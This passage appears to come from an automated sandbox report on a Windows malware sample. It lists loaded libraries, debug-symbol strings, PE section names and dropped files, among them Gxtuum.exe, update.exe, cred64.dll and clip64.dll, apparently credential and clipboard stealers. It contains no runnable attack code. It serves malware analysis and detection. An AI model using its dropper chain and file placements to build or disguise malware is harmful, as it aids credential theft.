                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: windowscodecs.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE77BA04-3C92-4d11-A1A5-42352A53E0E3}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office
                              Source: yINR7uQlPr.exeStatic PE information: Image base 0x140000000 > 0x60000000
                              Source: yINR7uQlPr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245746365.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246067900.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000020.00000002.2612705692.00000219A9004000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: System.ServiceModel.pdb; source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000B57000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241284492.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ucrtbase.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241984834.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240794322.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243521311.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244768009.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246183677.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbat source: powershell.exe, 00000020.00000002.2612509667.00000219A8FF9000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmp
                              Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000020.00000002.2612705692.00000219A9004000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241592467.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb8 source: powershell.exe, 00000020.00000002.2607042832.00000219A8EC0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243911711.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243013801.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244627444.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241018419.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: vcruntime140.amd64.pdbGCTL source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2270815482.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp
                              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242374350.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240577463.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241164887.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244255606.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbj source: D7AB.tmp.ssg.exe, 00000011.00000002.2662161359.0000000006DC2000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242660001.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ucrtbase.pdbUGP source: CC11.tmp.ctx.exe, 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: vcruntime140.amd64.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2270815482.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp
                              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246391912.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: softy.pdbat.6 source: powershell.exe, 00000020.00000002.2612509667.00000219A8FF9000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241491504.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243251482.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: mscorlib.pdb8 source: powershell.exe, 00000020.00000002.2607042832.00000219A8EC0000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242215513.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240684273.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244077458.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: System.ServiceModel.pdb source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ion.pdb} source: powershell.exe, 00000020.00000002.2602449809.00000219A8BAA000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2269356516.00007FF8A87CD000.00000002.00000001.01000000.0000000A.sdmp
                              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241882128.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245858639.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242520362.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242085986.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246488809.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb- source: powershell.exe, 00000020.00000002.2612134704.00000219A8FE3000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242778373.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243738070.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242897832.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: mscorlib.pdb source: powershell.exe, 00000020.00000002.2607042832.00000219A8ED5000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241382996.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245955915.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241786754.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241692866.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244947833.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246284261.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
                              Source: D7AB.tmp.ssg.exe.4.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E381050 LoadLibraryA,GetProcAddress,0_2_00007FF79E381050
                              Source: yINR7uQlPr.exeStatic PE information: section name: .x64
                              Source: 1DC30FADAFF92643095942.exe.0.drStatic PE information: section name: .x64
                              Source: E24B.tmp.update.exe.4.drStatic PE information: section name: .x64
                              Source: libcrypto-1_1.dll.11.drStatic PE information: section name: .00cfg
                              Source: update[1].exe.20.drStatic PE information: section name: .x64
                              Source: update.exe.20.drStatic PE information: section name: .x64
                              Source: update.exe0.20.drStatic PE information: section name: .x64
                              Source: cred64[1].dll.20.drStatic PE information: section name: _RDATA
                              Source: cred64.dll.20.drStatic PE information: section name: _RDATA
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E38DE59 push rbp; iretd 0_2_00007FF79E38DE5A
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E38DE70 push 00000041h; ret 0_2_00007FF79E38DE74
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E38DEC1 push rcx; iretd 0_2_00007FF79E38DEC2
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E38DCC2 push rbp; iretd 0_2_00007FF79E38DCC3
                              Source: C:\Windows\System32\svchost.exeCode function: 1_2_00007FF7E52BDE70 push 00000041h; ret 1_2_00007FF7E52BDE74
                              Source: C:\Windows\System32\svchost.exeCode function: 1_2_00007FF7E52BDE59 push rbp; iretd 1_2_00007FF7E52BDE5A
                              Source: C:\Windows\System32\svchost.exeCode function: 1_2_00007FF7E52BDCC2 push rbp; iretd 1_2_00007FF7E52BDCC3
                              Source: C:\Windows\System32\svchost.exeCode function: 1_2_00007FF7E52BDEC1 push rcx; iretd 1_2_00007FF7E52BDEC2
                              Source: C:\Windows\explorer.exeCode function: 4_2_033237D6 push rsi; ret 4_2_033237D7
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743DDE59 push rbp; iretd 6_2_00007FF6743DDE5A
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743DDE70 push 00000041h; ret 6_2_00007FF6743DDE74
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743DDCC2 push rbp; iretd 6_2_00007FF6743DDCC3
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743DDEC1 push rcx; iretd 6_2_00007FF6743DDEC2
                              Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF7A91BDE59 push rbp; iretd 8_2_00007FF7A91BDE5A
                              Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF7A91BDE70 push 00000041h; ret 8_2_00007FF7A91BDE74
                              Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF7A91BDCC2 push rbp; iretd 8_2_00007FF7A91BDCC3
                              Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF7A91BDEC1 push rcx; iretd 8_2_00007FF7A91BDEC2
                              Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF7179DDCC2 push rbp; iretd 9_2_00007FF7179DDCC3
                              Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF7179DDEC1 push rcx; iretd 9_2_00007FF7179DDEC2
                              Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF7179DDE59 push rbp; iretd 9_2_00007FF7179DDE5A
                              Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF7179DDE70 push 00000041h; ret 9_2_00007FF7179DDE74
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B832FAED push rdi; ret 16_2_00007FF8B832FAF4
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B832A096 push rdi; ret 16_2_00007FF8B832A0A2
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B8330200 push rdi; ret 16_2_00007FF8B8330206
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8B832A5B5 push rdi; ret 16_2_00007FF8B832A5BB
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF8BFB9CB1B push rbp; retf 16_2_00007FF8BFB9CB28
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006BA6B4 push ecx; ret 18_2_006BA6C7
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006A3573 pushad ; ret 18_2_006A358D
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006A750F pushad ; iretd 18_2_006A7510
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006AD989 pushfd ; retf 0000h18_2_006AD98A
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 19_2_007B3573 pushad ; ret 19_2_007B358D
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exeJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeFile created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Temp\10000830101\update.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\unicodedata.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\select.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\_bz2.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\libcrypto-1_1.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\_hashlib.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\_ctypes.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\ucrtbase.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Temp\10000820101\update.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeFile created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\_socket.pydJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\libffi-7.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\python38.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI71402\VCRUNTIME140.dllJump to dropped file
